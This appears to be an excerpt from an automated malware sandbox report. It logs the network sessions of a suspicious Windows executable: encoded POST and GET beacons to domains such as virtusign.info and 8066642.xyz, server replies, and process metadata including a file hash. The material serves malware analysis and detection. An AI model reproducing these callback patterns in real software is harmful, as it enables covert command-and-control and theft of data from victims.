Jan 10, 2025 20:18:49.432899952 CET	1236	IN	Data Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call'</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app'</a><br><a class="trace-frames" data-frame-id="3" h
Jan 10, 2025 20:18:49.432913065 CET	1236	IN	Data Raw: 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 Data Ascii: a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call'</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#
Jan 10, 2025 20:18:49.432929993 CET	1236	IN	Data Raw: 72 61 6d 65 2d 69 64 3d 22 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 Data Ascii: rame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:33:in `call'</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app'</a>
Jan 10, 2025 20:18:49.432936907 CET	1236	IN	Data Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 65 78 65 63 75 74 6f 72 2e 72 62 3a 31 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d Data Ascii: patch/middleware/executor.rb:14:in `call'</a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call'</a><br><a class="trace-frames" data-frame-id="12" href="#">r
Jan 10, 2025 20:18:49.432944059 CET	1224	IN	Data Raw: 2f 20 41 64 64 20 63 6c 69 63 6b 20 6c 69 73 74 65 6e 65 72 73 20 66 6f 72 20 61 6c 6c 20 73 74 61 63 6b 20 66 72 61 6d 65 73 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e Data Ascii: / Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target
Jan 10, 2025 20:18:49.432950974 CET	1236	IN	Data Raw: 6f 75 74 65 2d 68 65 6c 70 65 72 3d 22 5f 70 61 74 68 22 20 74 69 74 6c 65 3d 22 52 65 74 75 72 6e 73 20 61 20 72 65 6c 61 74 69 76 65 20 70 61 74 68 20 28 77 69 74 68 6f 75 74 20 74 68 65 20 68 74 74 70 20 6f 72 20 64 6f 6d 61 69 6e 29 22 20 68 Data Ascii: oute-helper="_path" title="Returns a relative path (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> <
Jan 10, 2025 20:18:49.437731028 CET	684	IN	Data Raw: 20 74 68 65 72 65 20 61 72 65 20 61 6e 79 20 6d 61 74 63 68 65 64 20 72 65 73 75 6c 74 73 20 69 6e 20 61 20 73 65 63 74 69 6f 6e 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 4e 6f 4d 61 74 63 68 28 73 65 63 74 69 6f 6e 2c 20 6e 6f 4d Data Ascii: there are any matched results in a section function checkNoMatch(section, noMatchText) { if (section.children.length <= 1) { section.innerHTML += noMatchText; } } // get JSON from URL and invoke callback with

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49953	216.40.34.41	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:18:51.392205000 CET	489	OUT	GET /lqx0/?28=ZcGFFFKPGpOKzuYlH0bTDaS6hCz3KyeMWvADo2w+EgPOJwiUlM35Knpfqh5LnbTmzp8Goxw1RSHUITR6WsGKOKvYVALk7yp6HMgY36QA1UuvockXGPvJZD8=&D48D=_fRxbHzp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.sweetspotfitness.net Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1
Jan 10, 2025 20:18:51.870760918 CET	1236	IN	HTTP/1.1 200 OK x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none referrer-policy: strict-origin-when-cross-origin content-type: text/html; charset=utf-8 etag: W/"9cdb28732f3ceee5af9fcef8cbb0bb37" cache-control: max-age=0, private, must-revalidate x-request-id: d419346f-e13b-4593-8e0c-f7942c30e9bb x-runtime: 0.007128 transfer-encoding: chunked connection: close Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED] Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>sweetspotfitness.net is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?sour
Jan 10, 2025 20:18:51.870827913 CET	1236	IN	Data Raw: 63 65 3d 70 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 Data Ascii: ce=parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>sweetspotfitness.net</h1><h2>is a totally awesome idea still being worked on
Jan 10, 2025 20:18:51.870862007 CET	448	IN	Data Raw: 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c Data Ascii: ><li><a rel="nofollow" href="https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=park
Jan 10, 2025 20:18:51.870898008 CET	1236	IN	Data Raw: 3d 22 35 30 22 20 72 3d 22 35 30 22 20 2f 3e 3c 67 20 74 72 61 6e 73 66 6f 72 6d 3d 22 73 63 61 6c 65 28 30 2e 32 35 20 30 2e 32 35 29 20 74 72 61 6e 73 6c 61 74 65 28 33 30 20 35 30 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 38 32 2e 34 30 39 2c Data Ascii: ="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.0
Jan 10, 2025 20:18:51.870933056 CET	1236	IN	Data Raw: 37 33 2c 30 20 2d 34 2e 34 37 31 31 34 2c 2d 30 2e 32 32 31 32 34 20 2d 36 2e 36 32 30 31 31 2c 2d 30 2e 36 33 31 31 34 20 34 2e 34 37 38 30 31 2c 31 33 2e 39 37 38 35 37 20 31 37 2e 34 37 32 31 34 2c 32 34 2e 31 35 31 34 33 20 33 32 2e 38 36 39 Data Ascii: 73,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.
Jan 10, 2025 20:18:51.870974064 CET	1102	IN	Data Raw: 30 20 31 30 33 74 33 20 39 36 2e 35 74 30 20 31 30 35 2e 35 74 2d 30 2e 35 20 37 36 2e 35 74 30 2e 35 20 37 36 2e 35 74 30 20 31 30 35 2e 35 74 2d 33 20 39 36 2e 35 74 2d 31 30 20 31 30 33 74 2d 31 38 2e 35 20 37 31 2e 35 71 2d 32 30 20 35 30 20 Data Ascii: 0 103t3 96.5t0 105.5t-0.5 76.5t0.5 76.5t0 105.5t-3 96.5t-10 103t-18.5 71.5q-20 50 -58 88t-88 58q-29 11 -71.5 18.5t-103 10t-96.5 3t-105.5 0t-76.5 -0.5zM1536 640q0 -229 -5 -317 q-10 -208 -124 -322t-322 -124q-88 -5 -317 -5t-317 5q-208 10 -322 124

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50007	3.33.130.190	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:05.536254883 CET	753	OUT	POST /69j2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.virtusign.info Cache-Control: no-cache Content-Length: 199 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.virtusign.info Referer: http://www.virtusign.info/69j2/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1 Data Raw: 32 38 3d 51 4a 6d 2f 39 50 66 68 6f 75 37 6b 39 5a 6f 61 44 6f 30 63 6a 4b 70 57 44 6f 48 44 42 66 42 76 35 72 50 68 77 67 50 72 34 44 44 6a 70 33 51 35 66 65 78 36 71 6c 36 41 75 73 74 6e 47 48 4b 78 55 30 30 49 65 44 4a 34 78 7a 33 77 62 72 57 50 30 6a 67 62 36 72 53 69 52 74 6c 69 73 43 55 61 79 74 56 57 46 2f 6f 4a 78 62 6f 51 49 34 44 56 4f 42 46 34 74 2f 6c 6c 44 72 4c 4f 54 68 36 62 73 74 74 33 38 73 44 65 6a 58 43 4e 39 36 46 50 6f 4e 7a 78 4f 42 79 6a 49 35 39 78 6e 4d 37 64 4b 63 47 6e 38 6e 4f 43 48 47 79 62 73 57 73 70 73 71 75 37 45 7a 72 41 56 45 44 33 34 72 57 6c 43 77 3d 3d Data Ascii: 28=QJm/9Pfhou7k9ZoaDo0cjKpWDoHDBfBv5rPhwgPr4DDjp3Q5fex6ql6AustnGHKxU00IeDJ4xz3wbrWP0jgb6rSiRtlisCUaytVWF/oJxboQI4DVOBF4t/llDrLOTh6bstt38sDejXCN96FPoNzxOByjI59xnM7dKcGn8nOCHGybsWspsqu7EzrAVED34rWlCw==
Jan 10, 2025 20:19:05.975632906 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50008	3.33.130.190	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:08.091295958 CET	773	OUT	POST /69j2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.virtusign.info Cache-Control: no-cache Content-Length: 219 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.virtusign.info Referer: http://www.virtusign.info/69j2/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1 Data Raw: 32 38 3d 51 4a 6d 2f 39 50 66 68 6f 75 37 6b 79 63 34 61 43 50 41 63 79 36 70 58 4d 49 48 44 4f 2f 42 7a 35 72 44 68 77 68 4b 6d 35 78 6e 6a 75 58 41 35 65 61 64 36 6d 46 36 41 68 38 73 6a 49 6e 4b 45 55 30 77 71 65 42 64 34 78 31 62 77 62 70 65 50 30 30 63 55 31 62 53 73 58 74 6c 67 68 69 55 61 79 74 56 57 46 2f 73 6a 78 66 4d 51 49 72 4c 56 4f 67 46 37 6c 66 6c 6b 47 72 4c 4f 59 42 36 66 73 74 73 51 38 70 2f 34 6a 52 47 4e 39 37 31 50 74 49 66 75 62 78 79 74 58 70 38 59 72 4d 79 46 54 76 57 6e 37 6e 57 4c 41 6b 36 43 74 51 68 7a 39 62 50 73 57 7a 50 7a 49 44 4b 44 31 6f 72 73 5a 77 76 6a 79 54 46 44 67 42 46 32 6e 39 4a 65 72 74 5a 35 37 6c 4d 3d Data Ascii: 28=QJm/9Pfhou7kyc4aCPAcy6pXMIHDO/Bz5rDhwhKm5xnjuXA5ead6mF6Ah8sjInKEU0wqeBd4x1bwbpeP00cU1bSsXtlghiUaytVWF/sjxfMQIrLVOgF7lflkGrLOYB6fstsQ8p/4jRGN971PtIfubxytXp8YrMyFTvWn7nWLAk6CtQhz9bPsWzPzIDKD1orsZwvjyTFDgBF2n9JertZ57lM=
Jan 10, 2025 20:19:08.533407927 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50009	3.33.130.190	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:10.633703947 CET	10855	OUT	POST /69j2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.virtusign.info Cache-Control: no-cache Content-Length: 10299 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.virtusign.info Referer: http://www.virtusign.info/69j2/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1 Data Raw: 32 38 3d 51 4a 6d 2f 39 50 66 68 6f 75 37 6b 79 63 34 61 43 50 41 63 79 36 70 58 4d 49 48 44 4f 2f 42 7a 35 72 44 68 77 68 4b 6d 35 78 76 6a 75 6c 34 35 66 39 4a 36 6f 6c 36 41 69 38 73 75 49 6e 4b 6a 55 77 6b 75 65 42 52 53 78 77 48 77 4a 38 4b 50 6a 51 49 55 75 4c 53 73 61 4e 6c 68 73 43 56 65 79 74 6c 61 46 2f 38 6a 78 66 4d 51 49 71 37 56 5a 68 46 37 6a 66 6c 6c 44 72 4c 38 54 68 36 33 73 74 30 71 38 6f 4b 46 6a 68 6d 4e 38 62 6c 50 71 71 48 75 48 68 79 76 55 70 38 41 72 4d 75 6b 54 70 7a 63 37 6b 4b 79 41 6d 6d 43 73 56 77 38 70 2f 48 55 48 41 66 73 54 67 57 4f 30 36 6e 30 56 54 72 5a 31 69 49 44 30 46 46 37 71 75 59 43 77 76 6c 64 70 6c 7a 47 4d 70 46 5a 6d 39 65 4e 6c 45 46 35 6e 6f 2b 4e 59 78 38 46 6a 6a 4c 46 39 75 7a 42 2f 6f 61 55 39 42 32 30 53 6a 6d 68 47 75 64 58 52 6f 5a 5a 70 32 4b 6f 6f 6e 33 54 49 54 42 66 6b 49 44 35 5a 51 36 33 64 5a 79 2b 79 4c 76 52 52 43 66 35 33 53 4e 57 59 31 4f 68 73 4c 54 2b 2b 2f 2f 32 79 46 6f 6c 38 6e 71 73 57 65 32 56 48 4d 46 49 69 63 6a 45 70 71 71 [TRUNCATED] Data Ascii: 28=QJm/9Pfhou7kyc4aCPAcy6pXMIHDO/Bz5rDhwhKm5xvjul45f9J6ol6Ai8suInKjUwkueBRSxwHwJ8KPjQIUuLSsaNlhsCVeytlaF/8jxfMQIq7VZhF7jfllDrL8Th63st0q8oKFjhmN8blPqqHuHhyvUp8ArMukTpzc7kKyAmmCsVw8p/HUHAfsTgWO06n0VTrZ1iID0FF7quYCwvldplzGMpFZm9eNlEF5no+NYx8FjjLF9uzB/oaU9B20SjmhGudXRoZZp2Koon3TITBfkID5ZQ63dZy+yLvRRCf53SNWY1OhsLT++//2yFol8nqsWe2VHMFIicjEpqqJtCdmxNeAoIcmXPu6q8NG/ekHmkF3vca0x/DnU7CnDwGLuy1JB9ywListDNnoG27gqam4+ds6RPFk7PsuH1p0HPMhLlLv3nUhJRpW9mx/l7Ro6Ww87p94VdmNwlY9MJsDt+Ae3/Sp/zzJSx631+ILpXMNTKwfeWQdq1rkfxOobQdmpcNMRuQvpcmI0JJ9ITbrf9P1X0TSu4dCh71opzXqI/hNSQKkgYcEfrg6ajlgmKXGbRD+1YiTHj/Q8Xmw+FaGotd5JZpYmf7BEYFVUQJ0oH4Ni2EFaPIHbVjQmISZAKBnu9oMTInMzrTflMw1SzPeRDEyxwCqLphASPPJaKkGFvTmOvBexRi7vycEEw5Q9JBxM4T/1qhqiZVKykBnqbwjTM1XZPAsL1YijmgJ/m59hbMv2VPq9m4n+s/6C5N23D285pTDnvJzni199rZ/LIxtmaZTD6tD6uIBN+qygsDPtahOlx0vPyDafVRGxgo7/tf92IrgHSRgPfAR+8+vDja+Wf9l7YQT2ANnrXbfrw876PLLtgCfAV0jwgAQI/KIeEiMzSKYeQjQuuMUm1ghFuhXDXnBD2JUpCdc/0E+DqVx8OIOl1OPgT3U6oB8YLz7Wf7kmM2tcTYkvDeiGpOhRAszgBa88lcp9MzwXuyexO5rybnuplKj7l+u6 [TRUNCATED]
Jan 10, 2025 20:19:11.109635115 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50010	3.33.130.190	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:13.174047947 CET	483	OUT	GET /69j2/?28=dLOf+4bthJ/u4c08U69ej48CCJnyAN8IrfKExSjlwiubv1BfPs9ejhiJo6s9NxKGEEo4eBxOiQfre4OpkQEfwraiUJhkrXAG1cZ+G+Id5d1uI+fzBgJa19I=&D48D=_fRxbHzp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.virtusign.info Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1
Jan 10, 2025 20:19:13.621006012 CET	373	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 19:19:13 GMT content-length: 252 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 38 3d 64 4c 4f 66 2b 34 62 74 68 4a 2f 75 34 63 30 38 55 36 39 65 6a 34 38 43 43 4a 6e 79 41 4e 38 49 72 66 4b 45 78 53 6a 6c 77 69 75 62 76 31 42 66 50 73 39 65 6a 68 69 4a 6f 36 73 39 4e 78 4b 47 45 45 6f 34 65 42 78 4f 69 51 66 72 65 34 4f 70 6b 51 45 66 77 72 61 69 55 4a 68 6b 72 58 41 47 31 63 5a 2b 47 2b 49 64 35 64 31 75 49 2b 66 7a 42 67 4a 61 31 39 49 3d 26 44 34 38 44 3d 5f 66 52 78 62 48 7a 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?28=dLOf+4bthJ/u4c08U69ej48CCJnyAN8IrfKExSjlwiubv1BfPs9ejhiJo6s9NxKGEEo4eBxOiQfre4OpkQEfwraiUJhkrXAG1cZ+G+Id5d1uI+fzBgJa19I=&D48D=_fRxbHzp"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50011	103.249.106.91	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:18.778896093 CET	744	OUT	POST /76t8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.8066642.xyz Cache-Control: no-cache Content-Length: 199 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.8066642.xyz Referer: http://www.8066642.xyz/76t8/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1 Data Raw: 32 38 3d 39 54 44 74 77 49 45 4a 2b 72 50 66 7a 41 47 4f 4c 4d 58 48 56 65 61 4c 45 51 2b 32 71 4d 4f 79 67 34 5a 39 66 63 6d 45 6d 67 67 4f 43 4d 55 49 4c 56 49 6b 31 7a 33 34 55 44 61 42 33 68 69 30 79 48 31 4e 36 36 6d 34 39 41 75 65 63 41 45 70 62 64 48 65 53 53 54 4d 4d 36 69 4e 52 56 56 54 42 36 47 65 56 46 58 55 37 78 78 55 4b 68 62 73 56 6b 4e 33 4b 49 51 72 69 42 41 33 56 75 6d 64 75 42 73 4d 56 7a 74 31 75 45 75 79 52 4a 59 31 46 47 45 30 43 43 6b 47 79 57 5a 68 75 77 66 51 62 4f 56 6c 6e 50 35 31 65 2b 2b 79 4f 76 43 6b 4e 72 6b 35 51 44 4c 57 72 79 74 53 38 4e 31 63 43 51 3d 3d Data Ascii: 28=9TDtwIEJ+rPfzAGOLMXHVeaLEQ+2qMOyg4Z9fcmEmggOCMUILVIk1z34UDaB3hi0yH1N66m49AuecAEpbdHeSSTMM6iNRVVTB6GeVFXU7xxUKhbsVkN3KIQriBA3VumduBsMVzt1uEuyRJY1FGE0CCkGyWZhuwfQbOVlnP51e++yOvCkNrk5QDLWrytS8N1cCQ==
Jan 10, 2025 20:19:19.653882027 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Fri, 10 Jan 2025 19:19:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50012	103.249.106.91	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:21.319701910 CET	764	OUT	POST /76t8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.8066642.xyz Cache-Control: no-cache Content-Length: 219 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.8066642.xyz Referer: http://www.8066642.xyz/76t8/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1 Data Raw: 32 38 3d 39 54 44 74 77 49 45 4a 2b 72 50 66 7a 6b 43 4f 51 74 58 48 51 2b 61 49 42 51 2b 32 6b 73 4f 32 67 35 6c 39 66 64 54 62 6d 57 77 4f 62 74 45 49 4b 52 6b 6b 34 54 33 34 41 54 61 49 34 42 69 46 79 48 34 77 36 37 61 34 39 41 36 65 63 45 41 70 62 75 2f 64 54 43 54 4b 5a 71 69 50 66 31 56 54 42 36 47 65 56 42 47 78 37 78 70 55 4b 53 44 73 61 6d 31 30 4c 49 51 6f 6c 42 41 33 59 4f 6d 6a 75 42 74 66 56 79 77 39 75 47 57 79 52 4a 49 31 46 58 45 31 62 79 6c 4e 38 32 59 64 70 79 2b 63 62 4c 67 57 35 64 5a 50 57 75 79 6c 47 4a 50 2b 63 61 46 75 43 44 76 6c 32 31 6b 6d 78 4f 49 56 5a 57 42 4c 45 4c 53 55 47 55 44 78 35 35 37 6f 37 75 33 6a 41 56 67 3d Data Ascii: 28=9TDtwIEJ+rPfzkCOQtXHQ+aIBQ+2ksO2g5l9fdTbmWwObtEIKRkk4T34ATaI4BiFyH4w67a49A6ecEApbu/dTCTKZqiPf1VTB6GeVBGx7xpUKSDsam10LIQolBA3YOmjuBtfVyw9uGWyRJI1FXE1bylN82Ydpy+cbLgW5dZPWuylGJP+caFuCDvl21kmxOIVZWBLELSUGUDx557o7u3jAVg=
Jan 10, 2025 20:19:22.193831921 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Fri, 10 Jan 2025 19:19:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Target ID:	0
Start time:	14:17:17
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\WyGagXWAfb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WyGagXWAfb.exe"
Imagebase:	0xb10000
File size:	1'210'368 bytes
MD5 hash:	6B53E14CA62426EF8A60D4A62A16A12B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:17:18
